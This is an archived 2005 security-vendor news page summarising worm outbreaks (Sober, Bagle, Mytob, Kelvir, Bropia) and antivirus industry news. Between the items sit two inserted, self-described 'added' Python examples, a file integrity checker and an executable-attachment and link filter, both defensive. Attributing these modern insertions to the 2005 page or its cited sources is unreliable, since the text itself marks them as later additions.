Virus News Archive
I.S. Sentry, Inc.
Information Systems Perimeter Security
Sales@ISSentry.Com



"So much is coming out so fast that the biggest hole now for companies and individuals keeping their virus signatures updated is the smaller and smaller window we have to figure out a virus and post a signature change," said Hinojosa. "Now it's typical that we have just a few hours of opportunity to get something out." - F-Secure

Virus News

IM Targeted by Two New Threats (CSO Online) 05/26/05
PC World reports that users of instant messaging applications from Yahoo and America Online are being warned this week of two new threats spreading via IM. The first is a worm targeting AOL’s Instant Messenger software that could potentially allow an attacker to gain control of a user’s system, according to security researchers. The other is a phishing scam propagated through Yahoo Messenger, which tries to lure users into revealing their Yahoo credentials. [Click here for Full Story]

Microsoft's Aim is Antivirus (smallbiz pipeline) 05/20/05
Microsoft is at work on enterprise antivirus, antispyware and other managed services to complement its recently announced Windows OneCare for consumers and small businesses, sources said.

The Redmond, Wash., software giant confirmed that it has an enterprise antivirus service in development, but other sources said Microsoft is developing a broad managed services platform that will also consist of antispyware and possibly Domain Name System (DNS) hardening, Wi-Fi provider ID assurance and firewall services for e-mail filtering.

Sources said there may be two "flavors" of the enterprise security services offered, one for enterprise customers and one for Microsoft Business Solutions targeting the SMB market. They said the services will be bundled into licensing agreements and also offered on a subscription basis.

"Initially, it will be antivirus, but there are ambitions to move beyond this as new hardware rolls out," said one partner, who requested anonymity. "The long-term aim is to have a comprehensive manageability platform. [Click here for Full Story]

Aggressive, Mass-Mailed Sober.p Worm Poised to Smack Users (smallbiz pipeline) 05/20/05
Monday may be a very bad day, a security researcher said Friday as he warned that the aggressive Sober worm of early May is timed to download new code the first day of next workweek.

Sober.p, the mass-mailed worm that spread voraciously by virtue of its offer of free World Cup tickets, is poised to launch another attack Monday, said Dmitri Alperovitch, a research engineer with Alpharetta, Ga.-based security firm CipherTrust.

"At the moment, the payload is unknown, but it may be another form of spam, like Sober.q; more malicious code, like another virus; or a denial-of-service attack."

Starting last weekend, Sober.p-infected machines were sent a Trojan horse, dubbed Sober.q by anti-virus vendors, that spewed out large amounts of right-wing German hate mail. [Click here for Full Story]

Microsoft Plans Enterprise Antivirus Effort (security pipeline) 05/17/05
Microsoft plans to deliver antivirus technology to its enterprise customers in the future, a key Microsoft security executive confirmed Tuesday.

During the company's monthly security briefing, the executive confirmed that Microsoft intends to make antivirus protection, like that built into the Windows OneCare service for small businesses and home users unveiled May 13, available to its large corporate accounts.

"We'll have an enterprise version," but Microsoft needs to offer centralized management capabilities before launching such a service for corporate customers, said Mike Nash, corporate vice president of Microsoft Security Business & Technology Unit. He declined to provide additional details about an enterprise version or when it would launch.

The Windows OneCare service, formerly code-named A1, is expected to move into its first round of beta testing this summer and full public beta later this year, Microsoft security executives said during the briefing on Tuesday. [Click here for Full Story]

Sober Worm Hides From AV Scanners (smallbiz pipeline) 05/11/05
One reason the Sober.p worm continues to spread is the way it hides from some anti-virus scanners, a Russian security firm said Wednesday.

Sober.p--also called Sober.s, Sober.o, and Sober.v by various anti-virus companies--includes a mechanism that prevents other programs from accessing its files, said Moscow-based Kaspersky Labs. That presents problems for some anti-virus software.

The tactic has been seen in previous Sobers, said Kaspersky, but it's been refined so that no applications, not even those running under a SYSTEM account, can access them.

"If something can't be scanned, then malicious code can't be detected," Kaspersky said in an online alert. "This rules out the chance of Sober being detected while running an on-demand scan." [Click here for Full Story]

Sober Hasn't Slowed, Still Accounts for 4 of 5 Worms and Viruses (smallbiz pipeline) 05/05/05
Sober.p, the worm that stormed the Internet Monday, showed no signs of fading away as of Thursday morning, an anti-virus vendor said.

"It's had quite the impact," said Graham Cluley, a senior technology consultant with Sophos. "Although it's not on the level of a really major worm, like Sobig of last year, Sober is the biggest we've seen so far this year."

The worm broke Monday and quickly gained steam in Western Europe before hitting American PCs. Within hours it dominated the malware charts by making up 70 percent or more of the malicious code traffic spotted by anti-virus monitoring stations.

Contrary to some analysts' expectations, Sober hasn't yet slowed. It's been spotted in 40 countries so far, said Cluley, and currently accounts for 79.6 percent of all worms and viruses making the rounds.

"Sober is very much hanging in there," said Cluley. "Right now, it's accounting for 5.3 percent of all e-mail, legitimate or otherwise. Over 1 in 20 e-mails, in other words, is Sober. That's ferocious."  [Click here for Full Story]

Another Sober Worm Spreading Quickly (desktop pipeline) 05/03/05
Another version of the dual-language Sober worm hit the Internet mid-day Monday, and by Tuesday was accounting for a stunning 70 percent of all malicious code traffic according to one anti-virus vendor.

Sober.p -- also called Sober.n and Sober.o in the confusing mishmash that's the naming structure of worms and viruses -- is epidemic in Western Europe, said two firms there, Sophos and Kaspersky Labs. Although the worm hasn't made as much headway in the U.S., it's currently the most dangerous new threat on the books, according to Symantec and McAfee, both of which raised their alert warnings to "medium" on Monday afternoon as Sober spread.

"It's currently running at about 70 percent of all mail traffic, worldwide, but it seems to have plateaued," said Ted Anglace, a senior security analyst in Sophos' Boston office. "It's leveling off."

Like earlier Sober variations, this one is bilingual -- it uses both English and German headings and text -- and spreads by mass mailing copies of itself to addresses it harvests from the infected machine. [Click here for Full Story]

Panda TruPrevent Claims 'Zero Day' Virus Protection (desktop pipeline) 04/28/05
Panda Software has introduced TruPrevent 2.0, an anti-virus and security technology that it claims can identify and remove new viruses and spyware without depending on signature files or databases of known threats.

According to the company, TruPrevent can recognize and eliminate viruses, spyware, adware, Trojans, worms, "bots" and even hacker attempts, yet it requires no tuning, training or updates.

"The traditional signature- and rules-based products from competitors like Norton and McAfee were adequate back when they were invented in the era when viruses took days, weeks or even months to propagate on floppy disks and 'sneaker-nets,' but now malware can travel around the world in minutes on the Internet," said Patrick Hinojosa, CTO of Panda Software USA, in a statement. "Panda Labs developed TruPrevent to protect users from this new kind of malware threat -- 'flash' viruses and 'zero day attacks' -- malicious software that can attack instantaneously and globally." [Click here for Full Story]

Bagle Worm Seen as 'Blueprint' For Web Criminals (desktop pipeline) 04/28/05
A pair of research reports have explored the long-running Bagle worm and laid out a chronology that points to a professional developer who, like counterparts in the commercial software world, is constantly testing, tweaking, and improving his code for profit, not pride of ownership.

The Bagle worm debuted in mid-January 2004 and, according to most anti-virus firms, has been spotted in 60 to 100 variations since then. It's also usually credited with starting the malware-for-profit movement among hackers who, before this ground-breaking worm, were typically motivated by notoriety.

Jason Gordon, an analyst with security research firm infectionvectors.com by night and a security consultant to Department of Defense clients by day, spent the last year watching each edition of Bagle, and recently completed the final third of a three-part report.

"In the year since its release," he wrote in that report, "Bagle has had a major impact on the Internet" primarily because it was, and remains, "a leader in the nefarious Web economy of spamming, phishing, and stealing passwords." [Click here for Full Story]

Trend Micro Virus Update Freezes PCs (desktop pipeline) 04/25/05
Security vendor Trend Micro distributed a faulty virus definition file on Friday that slowed thousands of PCs worldwide to a crawl, the company admitted Monday.

The virus definition file was released Friday at about 3:30 p.m. PDT to both the Trend Micro Web site (where users could retrieve it manually) and to the firm's automatic update servers. The file was to update Trend Micro's OfficeScan, PC-cillin, ServerProtect for NT, Client/Server Suite for SMB, and Client/Server/Messaging Suite for SMB.

Rather than simply update the anti-virus files, however, the new definition brought machines to their knees by chewing up virtually every processor cycle.

"We confirmed that a virus pattern file which we distributed on April 23, 2005, from 7:33 a.m. to 9:02 a.m., Tokyo Local Time, significantly slowed the performance of our customers' computers and in some cases made their computers inaccessible," said Trend Micro in a statement from its Tokyo office on Monday. "This trouble was caused by insufficient work in compatibility testing of the product with the operating system before it was released." [Click here for Full Story]

McAfee: Unpatched Machines a Major Security Threat (desktop pipeline) 04/25/05
Hackers will keep cranking out exploits that take advantage of known software vulnerabilities because, although patches are available, only a minority of machines actually get them applied, security vendor McAfee said Monday.

In releasing its quarterly security analysis, McAfee's "AVERT" virus research team noted that exploited vulnerabilities are becoming a dominant threat to both consumers and enterprises.

"The day of the virus may have come and gone," said Vincent Gullotto, the vice president of AVERT. "One day it may swing back, but now we're looking at different types of programs, not viruses, that threaten computers. And many of them are exploiting machines' vulnerabilities."

According to AVERT's estimates, half or more of the computers connected to the Internet aren't properly patched or updated. Not good, especially when the number of vulnerabilities spotted in the first quarter of 2005 was up 6 percent over the same quarter last year. [Click here for Full Story]

Worm Lull, Windows XP SP2 Keeping Outbreaks at Bay (smallbiz pipeline) 04/22/05
E-mailed worms pose less of a threat and Microsoft has been lucky so far, said a virus researcher Friday in explaining why 2005 has been relatively quiet on the security front.

"2004 was distinguished by a number of major epidemics caused by e-mail worms such as MyDoom, NetSky, Bagle, and Zafi," said Alexander Gostev, a senior analyst with Moscow-based Kaspersky Labs, in a report he authored on the security situation for the first quarter of the year.

"However, late 2004 and early 2005 were free of such outbreaks, with nothing on the scale of even the mid-sized outbreaks of 2004," Gostev added.

The decline in destructive power of e-mailed worms may be due to anti-virus vendors developing new technologies to address them, including detecting worms in compressed .zip files and pre-scanning messages with executable attachments, but he also gave credit to Microsoft for patching several Outlook and Outlook Express vulnerabilities. He even tipped his hat at the press for banging the security drum. [Click here for Full Story]

Hackers Use Blogs to Spread Worms, Keyloggers (smallbiz pipeline) 04/13/05
Blogs aren't just for blabbing to friends and family, said a security and content filtering firm Wednesday, but increasingly are being used as a safe haven by hackers for storing and distributing malicious code, including identity-stealing keyloggers.

"We're seeing that more and more of the locations where malicious code is stored is on blog sites," said Dan Hubbard, the senior director of security and technology research for San Diego-based Websense. So far this year, Hubbard said, his lab has discovered hundreds of blogs involved in the storage and delivery of harmful code.

"In particular, keyloggers and other Trojan downloaders and droppers are being stored and updated from blog sites," Hubbard added. A keylogger is a type of spyware that silently records keystrokes and transmits the captured identity data to the attacker. [Click here for Full Story]

Tip Sheet: How to Protect Against a Zero-Hour Attack (smallbiz pipeline) 04/15/05
Here are six good ideas for keeping your computer systems safe from viruses and worms. By Rob McCarthy Courtesy of TechLearning

In the last year, a series of viruses and worms that caused damage across the Internet in record time has made very clear how vulnerable our computer systems are. The MS Blaster, Slammer, Sasser, and Korgo.W worms have shown that signature-based antivirus software and traditional firewalls are not enough to protect networks. Everyone is worried about a zero-hour attack — an attack based on a previously unknown vulnerability, for which no antivirus signature yet exists. What can you do to protect your network from such an event? Here are a few ideas: Use file integrity checking. [Click here for Full Story]
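The first of those ideas, file integrity checking, in working form. This is an added example, not code from the tip sheet, from TechLearning or from any vendor: it takes a SHA-256 baseline of a directory tree and later reports what was added, removed or modified. It also covers the point of the Sober.p item above (a file the scanner cannot open): such a file is reported as a finding rather than silently skipped. The `opener` parameter and the sample directory contents are assumptions made so the example runs anywhere.

```python
"""
Baseline-and-compare file integrity checker (added example; not code from the
tip sheet, from Kaspersky or from any vendor).

It records a SHA-256 hash of every regular file under a directory, then
reports files added, removed or modified since that baseline.  A file the
scanner cannot open (for example one a running process holds with an
exclusive lock, the trick the Sober.p story above describes) is reported as
UNREADABLE rather than silently skipped: an unscannable file is a finding.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path

UNREADABLE = "UNREADABLE"


def hash_file(path, opener=open, chunk_size=65536):
    """Return the hex SHA-256 of a file, or UNREADABLE if it cannot be opened.

    `opener` is an assumption of this example: it exists only so the failure
    path can be exercised on any platform.  Real use keeps the default.
    """
    digest = hashlib.sha256()
    try:
        with opener(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(chunk_size), b""):
                digest.update(chunk)
    except OSError:
        # PermissionError, sharing violation, locked file: record, don't skip.
        return UNREADABLE
    return digest.hexdigest()


def snapshot(root, opener=open):
    """Map each regular file under root (relative POSIX path) to its hash."""
    root = Path(root)
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue  # hashing through symlinks invites path games
            result[p.relative_to(root).as_posix()] = hash_file(p, opener)
    return result


def compare(baseline, current):
    """Classify the differences between two snapshots."""
    report = {"added": [], "removed": [], "modified": [], "unreadable": []}
    for rel, digest in current.items():
        if digest == UNREADABLE:
            report["unreadable"].append(rel)
        elif rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
    report["removed"] = [rel for rel in baseline if rel not in current]
    for key in report:
        report[key].sort()
    return report


def save_baseline(snap, path):
    # Keep the baseline where the monitored host cannot rewrite it (read-only
    # media, another machine): a baseline an intruder can edit proves nothing.
    Path(path).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def demo():
    """Constructed scenario in a temporary directory; returns the report."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "tree"
        (tree / "bin").mkdir(parents=True)
        (tree / "bin" / "svc.exe").write_bytes(b"MZ original service")
        (tree / "etc.cfg").write_text("setting=1\n")
        baseline_path = Path(tmp) / "baseline.json"   # kept outside the tree
        save_baseline(snapshot(tree), baseline_path)
        # Later: the binary is patched, a dropper appears, a config vanishes.
        (tree / "bin" / "svc.exe").write_bytes(b"MZ trojanised service")
        (tree / "bin" / "dropper.pif").write_bytes(b"MZ")
        (tree / "etc.cfg").unlink()
        return compare(load_baseline(baseline_path), snapshot(tree))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run it as-is to see the constructed scenario; for real use, call snapshot() on the directories you care about, store the result off-host, and diff on a schedule. The "unreadable" bucket is the one to watch on a machine that is otherwise clean.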

New MSN Messenger Stops Some Worms (desktop pipeline) 04/08/05
Tucked inside the just-released MSN Messenger are features to stymie the spread of some of the IM worms that have been knocking Microsoft's instant messaging clients, a security firm said Friday.

MSN Messenger 7, said Moscow-based Kaspersky Labs in its analysts' blog, now blocks .pif files, which have been used by IM worms such as Kelvir and Bropia that have targeted Microsoft's IM software.

"Any incoming or outgoing message with a .pif will be blocked completely," said Kaspersky.

Unfortunately, MSN Messenger 7 doesn't let users know this. "Messages won't get delivered to the recipient, but neither the recipient nor sender will be notified that the message has been blocked," continued Kaspersky. [Click here for Full Article]

Mytob Worm Family Just Keeps Growing (desktop pipeline) 04/11/05
The Mytob worm family has grown by leaps and bounds -- half a dozen variants just this past weekend -- and is a marker of the trend toward more-more-more by virus and worm writers, a security analyst said Monday.

Since its debut about six weeks ago, 40 Mytob variants have appeared, a record number of variants for a single worm family.

"The writer or writers of Mytob have been very busy creating variants," said Graham Cluley, an analyst with the U.K.-based anti-virus vendor Sophos. "They're trying to get it past anti-virus defenses by making small changes, and constantly tweaking it."

The half-dozen versions that rolled out over the weekend, said Cluley, point out the lengths to which virus writers will go to sneak by defenses. "The writers will produce a version, which is then detected by anti-virus labs, then the writers create a new version to top the last one. In the case of those over the weekend, they were similar enough that we could say they were all from the Mytob family, and detect them with a generic signature already in place."  [Click here for Full Article]

Symantec's Anti-Virus Vulnerable To Denial-of-Service Attacks (security pipeline) 03/29/05
Symantec's Norton AntiVirus line has a pair of vulnerabilities that hackers could exploit to crash or hang a targeted PC, Symantec announced Monday.

The Cupertino, Calif.-based security company's consumer AntiVirus 2004 and AntiVirus 2005 series are at risk, said Symantec, as well as the Internet Security and SystemWorks lines, which bundle AntiVirus with other security or PC maintenance tools.

Errors can be forced, said Symantec, by attackers feeding specific file types to a machine protected by AntiVirus' Auto-Protect module, or by renaming a file on a network share that's then scanned by Auto-Protect. (Auto-Protect is Symantec's name for the real-time scanner that sniffs through files as they're opened or downloaded.)

The errors can cause the PC to either slow down to the point of being unusable, then crash, or hang, forcing its user to reboot. [Click here for Full Article]

Are Wireless Virus Threats for Real This Time? (security pipeline) 03/07/05
By E. Kelly Hansen. Doomsday scenarios regarding PDA and wireless viruses have been circulating since 2000, when the first PDA-specific virus, Phage 1.0, surfaced. 2001 was to be the year of the wireless virus, according to both IDC and Gartner. Four years later, the soothsayers are back, proclaiming the dangers of these airborne attacks. Should we listen this time?

Last year, two new worms surfaced--Skulls.a and Cabir.a--that had a far greater impact on the popular psyche than on systems. Cabir.a was clearly devised as a proof of concept. The worm's only danger was that it dramatically reduced battery life for Bluetooth devices. Why were these harmless viruses being trumpeted as signs of a forthcoming mobile Armageddon?

It turns out certain Bluetooth smartphones can be hijacked so that the attacker controls the device and, unbeknownst to the user, can dial a third party. This attack can turn a smart phone into a remote bug, broadcasting conversations from an unsuspecting user's pocket. And in August 2004, a team at Flexilis, a wireless research and development company, created a device called the BlueSniper rifle, which could target Bluetooth smartphones from more than a mile away. [Click here for Full Article]

Virus Writers Have Little to Fear (security pipeline) 03/07/05
Virus writers have little to fear, a security firm said Monday, and know they can practice their craft with near impunity.

The most recent Bagle explosion "shows once again how helpless legislation is in the face of cybercrime," said Moscow-based Kaspersky Labs in a statement posted to its security site. "Cybercrime laws are local, and are specific to individual countries. But virus writers aren't constrained by national boundaries."

In particular, the plague of Bagle variants has Kaspersky researchers convinced that the authors of several worm families are in cahoots.

"It's become clear that the authors of Bagle, Netsky, Zafi, and a whole range of other malicious programs are working closely together. They may not know each other personally, but they're all using information from the author of Bagle to send out their creations." [Click here for Full Article]

McAfee Revamps Hosted Antivirus Service for SMBs (smallbiz pipeline) 03/04/05
In an effort to resurrect its maligned managed security service effort, McAfee will unveil this week a new service to provide small and midsize businesses with hosted antivirus protection.

Available only to solution providers in McAfee's Security Alliance partner program, the new Partner Security Service gives solution providers a more flexible contract under which to work and offers expanded upselling opportunities, the partners said.

Based on the latest McAfee Managed VirusScan technology, the new service is a revised take on McAfee's VirusScan ASaP, which has long prompted complaints from partners. Partner Security Service includes Web-based administration and reporting, spyware detection and rapid-response technical support through McAfee's Avert division. [Click here for Full Article]

New IM Worm Hits MSN Messenger (desktop pipeline) 03/07/05
New worms spreading through MSN Messenger -- and Windows Messenger, the version bundled with Windows -- via links to a malicious site are infecting users and leaving their PCs open to hacker hijack, security vendors reported Monday.

The new worms, tagged as Kelvir.a and Kelvir.b, appeared over the weekend and on Monday, respectively, anti-virus vendors said. Both use the same mechanism to attract users and infect Windows-based PCs: they include a link in the instant message. That link, in turn, downloads a malicious file -- the actual worm, a variant of the long-running Spybot -- which opens a backdoor to the compromised machine.

Kelvir spreads by sending itself to all the MSN/Windows Messenger contacts on the infected PC, and poses as cryptic messages such as "lol! see it! u'll like it!" and "omg this is funny!" The link opens a .pif-formatted file.

.pif files are also often a format-of-choice for mass-mailed worms. [Click here for Full Article]
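The .pif blocking described in the MSN Messenger 7 item above, and the link-borne delivery Kelvir uses, as an added example (not Microsoft's code or any vendor's). It screens both attached filenames and URLs in the message text against a list of Windows-executable extensions, catches double extensions such as funny.jpg.pif, and returns a reason so that, unlike the silent drop Kaspersky complained about, both parties can be told why a message was blocked. The extension list and the sample messages are constructed for the example.

```python
"""
Executable-attachment and link filter for an IM or mail gateway (added
example; not MSN Messenger's code or any vendor's).

The MSN Messenger 7 story above blocks one extension silently.  A gateway
check should instead use a list of Windows-executable extensions, catch
double extensions such as "funny.jpg.pif", inspect links as well as attached
files (the Kelvir vector: a chat line carrying a URL to a .pif), and return a
reason so sender and recipient can be told why a message was dropped.
"""
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Extensions Windows will run directly when double-clicked.  The list is an
# assumption for this example; a real gateway would take it from policy.
EXECUTABLE_EXTENSIONS = {
    ".pif", ".scr", ".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe",
    ".js", ".jse", ".wsf", ".wsh", ".hta", ".cpl", ".lnk", ".reg",
}

URL_RE = re.compile(r"(?:https?|ftp)://[^\s<>\"']+", re.IGNORECASE)
TRAILING_PUNCT = ".,;:)!?"


def dangerous_extension(filename):
    """Return the offending extension (lower-case) or None.

    Only the last suffix decides, so "funny.jpg.pif" is caught; trailing dots
    and spaces, which Windows strips when saving, are removed first.
    """
    name = filename.strip().rstrip(". ").lower()
    _stem, ext = posixpath.splitext(name)
    return ext if ext in EXECUTABLE_EXTENSIONS else None


def dangerous_urls(text):
    """Return [(url, ext)] for links whose path or query names an executable."""
    findings = []
    for raw in URL_RE.findall(text):
        url = raw.rstrip(TRAILING_PUNCT)          # "...a.scr." -> "...a.scr"
        parts = urlsplit(url)
        candidates = [posixpath.basename(parts.path)]
        # "view.php?img=me.jpg.pif" names the file in the query string
        candidates += [v for _k, v in parse_qsl(parts.query, keep_blank_values=True)]
        for cand in candidates:
            ext = dangerous_extension(cand)
            if ext:
                findings.append((url, ext))
                break
    return findings


def screen_message(text, attachments=()):
    """Decide whether to deliver a message.

    Returns (deliver, reasons).  `reasons` is meant to be shown to both
    parties; an empty list means deliver.
    """
    reasons = []
    for name in attachments:
        ext = dangerous_extension(name)
        if ext:
            reasons.append(f"attachment {name!r} blocked: {ext} is executable")
    for url, ext in dangerous_urls(text):
        reasons.append(f"link {url!r} blocked: it points to a {ext} file")
    return (not reasons, reasons)


if __name__ == "__main__":
    # Constructed samples modelled on the lures quoted in the Kelvir story.
    samples = [
        ("lol! see it! u'll like it! http://example.invalid/pics/funny.pif", ()),
        ("omg this is funny! http://example.invalid/view.php?img=me.jpg.PIF", ()),
        ("holiday pics http://example.invalid/photos/beach.jpg", ()),
        ("sent you a pic", ("roast_chicken.jpg.pif",)),
    ]
    for text, atts in samples:
        print(screen_message(text, atts))
```

Extension checks are a cheap first gate, not a substitute for scanning: a gateway that can only see a link cannot know what the server will return, so the same list should also be applied to the filename the downloader eventually writes.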

Crafty Bagle Viruses Keep Spreading (cnet) 03/04/05
Late at night on February 28, 2005, two versions of the Bagle virus were released onto the Internet. That event, in itself, wasn't too remarkable, given that the source code for the Bagle virus is widely available on the Internet today, and we've seen about 50 variations of Bagle since its inception in early 2004. However, the two new variations of Bagle were responsible for spreading four new versions of a Trojan horse. Oddly, these Trojans don't include mechanisms to spread beyond the infected computers, which seems counterintuitive (at first).

Defies viral definition, perhaps

My own definition of a computer virus includes the mention that the malicious code can't spread by itself. To spread, someone has to e-mail the infected code or otherwise share those files with others. Over the last five years, we've grown used to automatic mailers combined within the infected e-mail attachment viruses such as I Love You. The automatic mailers are little SMTP engines that send out perfect copies of themselves--viral-infected e-mail sent to addresses harvested from infected computers. And we've also grown used to the computer worm, malicious code that by definition exists to move from computer to computer, often scanning the Internet for vulnerable systems to infect. So, how bad is a viral e-mail message with a Trojan horse that can't spread? Plenty bad. [Click here for Full Article]

Multiple Versions of Bagle Trojan Swamp Antivirus Defenses (smallbiz pipeline) 03/01/05
A major wave of Bagle-like Trojan horses hit users worldwide Tuesday with numerous variations that aim to overwhelm anti-virus defenses by morphing faster than research labs can release new signatures.

The attack, which began about midnight EST, was launched in a large-scale spamming campaign, said virus researchers, and although the new threat doesn't spread on its own -- these are Trojans with Bagle characteristics, not true worms -- many security vendors have bumped up warnings to get out the word.

It's unclear how many variations are on the loose. Some vendors, such as Symantec, had reported only two as of mid-morning Tuesday. Others, such as the U.K.-based Sophos, said there were at least four or five distinct versions. According to Reston, Va.-based iDefense, some sources are reporting as many as 15 copy-cats.

"Wave attacks are becoming increasingly common," said Ken Dunham, iDefense's director of malicious code research, in an e-mail to TechWeb. "Multiple minor variants are rapidly seeded into the wild to help the overall success of the attack." [Click here for Full Article]

Predicted Wave of Worm Hits, then Dissipates (smallbiz pipeline) 02/22/05
The predicted wave of MyDooms continued through the weekend, security firms reported, and a new edition of Sober, the German-made worm that continues to bedevil users, made the rounds with some success.

Last week, when MyDoom.bc appeared, a security analyst at Computer Associates noted that the worm had a history of rolling out several variants in succession, then taking a break. "MyDooms usually come in a string of four or five in a row that use essentially the same code," said Sam Curry, vice president of Computer Associates' eTrust security group, last Thursday.

That's exactly what happened. Late Friday and over the weekend, McAfee tracked three new copy-cats, and dubbed them MyDoom.bd, MyDoom.be, and MyDoom.bf. Like Thursday's MyDoom.bc, the .bd and .be variants were tagged as "medium" threats by the Santa Clara, Calif.-based anti-virus vendor.

The new variations are virtually identical to MyDoom.bc, and even earlier editions going back as far as the summer of 2004 and MyDoom.o, said analysts Tuesday. [Click here for Full Article]

New Sober Worm Spreading Quickly (PC World.Com) 02/22/05
A new version of the Sober worm wriggled out of its hole early on Monday and set about quickly attacking computers in Europe and the U.S., a security services company says. The worm is a mass-mailer, meaning it spreads itself via e-mail using contacts listed in the address books of computers it infects.

The first instance of the worm, called W32.Sober-K-mm, was intercepted by U.K. security company MessageLabs. The company detected 663 instances of the worm in the first hour, and the figure climbed quickly to more than 2,200 instances over the next five to six hours, prompting MessageLabs to give it a high-risk rating, says Maksym Schipka, a senior antivirus researcher with the company.

"Compared to other Sober worms, it looks to me like this one is spreading itself more aggressively," he says. [Click here for Full Article]

Be Afraid, Be Very Afraid of Valentine's Day E-Mail (smallbiz pipeline) 02/08/05
The days running up to Feb. 14 are when employees are at the greatest risk of running afoul of company e-mail policies, a messaging security firm said Tuesday.

Redwood City, Calif.-based Clearswift warned workers not to fall for the e-mail and Web security pitfalls that are prevalent around Valentine's Day.

Not only is Valentine's Day-oriented spam surging -- hyping flowers and chocolate -- but phishers are active, too, enticing consumers to spoofed Web sites. Hackers also use the holiday, said Clearswift's Pete Simpson, the manager of the company's ThreatLab, to get recipients to open attachments or click on links to purported e-greeting cards.

"Affectionate e-mails, purporting to be from a potential lover, have proven to be effective in tricking people to break security procedures -- taking advantage of [people's] weaknesses," said Simpson in a statement. [Click here for Full Article]

'Dead' Saddam E-Mails Hide a Worm (desktop pipeline) 02/04/05
E-mails claiming to come with photos of Saddam Hussein shot dead while trying to escape custody are spreading a worm that hijacks the PC.

Messages churned out by the Bobax.h worm can arrive with the subject heading of "Saddam Hussein - Attempted Escape, Shot dead Attached some pics that i found," said U.K.-based Sophos.

The attached file, of course, is nothing of the kind, but instead is the worm, which when run, propagates to other machines, tries to disable anti-virus and security software, and installs an e-mail relay module which can be used by remote hackers for sending spam. [Click here for Website]

Antivirus Tools Fool XP's Security Center (PC World.Com) 02/02/05
The McAfee Security Center under Windows XP SP2 incorrectly indicated that our test machine was fully protected, prior to updating.

Microsoft's Windows XP Service Pack 2 is supposed to improve security. Its Windows Security Center should alert you when your antivirus software is missing or out of date. But in our tests, both McAfee's Internet Security Suite 2005 and Symantec's Norton Internet Security 2005 crippled SP2's ability to deliver accurate alerts immediately after installation.

We installed each application on a PC running SP2, and both caused the Windows Security Center to report erroneously that the products were up-to-date. Any antivirus software must be updated immediately after you install it to protect the computer against viruses discovered since the software's initial release.

McAfee and Symantec acknowledge that their products intentionally disable the Windows Security Center's messaging feature. Both companies say the reason for doing so is to streamline customers' experience; neither company plans to alter its practices. [Click here for Website]

MSN Messenger hit by double-whammy worm (cNet) 02/03/05
Trend Micro is warning of a new variant of the Bropia worm that uses MSN Messenger to spread.

The Bropia.F worm is packaged with a second, more damaging worm that tries to exploit poorly patched computers, the antivirus company said on Thursday.

The latest variant of the Bropia worm was discovered on Wednesday evening, Trend Micro said. It infects systems belonging to users of MSN Messenger by sending itself as a picture of a roast chicken with tan lines to all available or online contacts. It also releases a second, more dangerous worm, called Agobot.ajc, on the infected computer.

Adam Biviano, a senior systems engineer at Trend Micro, said that although there have only been a handful of reported infections, the company has declared the worm a medium risk, because of its potential to spread and steal users' bandwidth. [Click here for Website]

Mobile Viruses Just Getting Started (smallbiz pipeline) 01/25/05
While viruses that attack phones are few and far between now, when they get traction -- and they will -- the lousy state of security in smart phones means trouble for users and providers, an analyst said Tuesday.

Most of the mobile malicious code that's popped up so far -- such as Cabir, a worm that's spread to several countries via Bluetooth-enabled phones -- isn't dangerous or destructive, said Brian Pellegrini, a wireless analyst with ABI Research.

The sorry state of malicious code directed toward mobile devices, said Pellegrini, is due to the small base of smart phone users. "First of all, there's not a lot [of people] out there [using smart phones] to be infected or start complaining about viruses," he said. "And because the numbers are small, phones are just starting to be noticed by virus writers."  [Click here for Website]

Worm Steals CNN Headlines To Fool Users (desktop pipeline) 01/21/05
A new worm uses breaking news -- and a devious technique to keep itself up-to-date -- to dupe recipients into opening attachments, an anti-virus firm said Friday.

U.K.-based security vendor Sophos said that the Crowt.a worm grabs its subject lines, message content, and attachment names from headlines culled in real-time from CNN's Web site. The worm's subject and attachment filename constantly change to mirror the top headline on CNN.com, while the e-mail message's text is also hijacked from CNN.

The idea is to fool recipients into thinking that they're reading a legitimate newsletter or news brief rather than looking at a payload-carrying message about to infect their PC.  [Click here for Website]

Trio Of Pesky 'Firsts' Threaten Computer Users (security pipeline) 01/18/05
The new year's not even three weeks old, and already hackers have logged some troublesome firsts, security analysts said Tuesday.

The first worm that took advantage of the Dec. 26 earthquake and tsunami disasters has appeared, several anti-virus firms warned users Tuesday. Dubbed "Zar.a," the worm uses the subject "Tsunami Donation! Please help" and message copy "Please help us with your donation and view the attachment below! We need you!" to dupe recipients into opening the attachment and launching the worm.

Although Zar.a -- which has been labeled Sun.a by a few security companies -- spreads by hijacking addresses it finds in the Microsoft Outlook address book, it doesn't seem to do any damage or open any backdoors in the infected machine. Instead, its goal appears to be to launch a denial-of-service (DoS) attack against a hacker Web site. As of mid-day Tuesday, that site was offline. [Click here for Website]

Security Software: Downloads and Trials (Microsoft) 01/13/05
Download antivirus software, firewalls, spyware removal tools, and more to improve the security of your computer and to help keep it running smoothly.

Microsoft Windows XP Service Pack 2 (SP2): Get better protection against viruses, hackers, and worms. This service pack includes Windows Firewall, Pop-up Blocker for Internet Explorer, and the Windows Security Center.

Microsoft Windows Antispyware (Beta): Download our new anti-spyware software to help protect your PC from spyware and other potentially unwanted software.

MSN Toolbar: Block pop-up ads with Pop-up Guard. Help prevent pop-up windows from appearing while you browse the Web (works with Windows 98 and later). [Click here for Website]

Pre-Christmas Worm Tops December's Chart (Information Week)  01/06/05
The fast-spreading Zafi.d worm, which snuck onto users' PCs by using a holiday greeting customized to the likely language of the recipient, soared to the top of December's list of most common malicious code, security firm Sophos said Thursday.

"Although it was only discovered mid-month, Zafi.d caused major havoc during the holidays, accounting for more than a third of all virus reports in December," said Gregg Mastoras, a senior security analyst at Sophos, in a statement. "Only 24 hours after it was discovered, Zafi.d accounted for more than 72 percent of all virus reports, and one in ten e-mails were infected by the worm. It's quite alarming to see a virus gain so much traction in such a short amount of time." [Click here for Full Story]

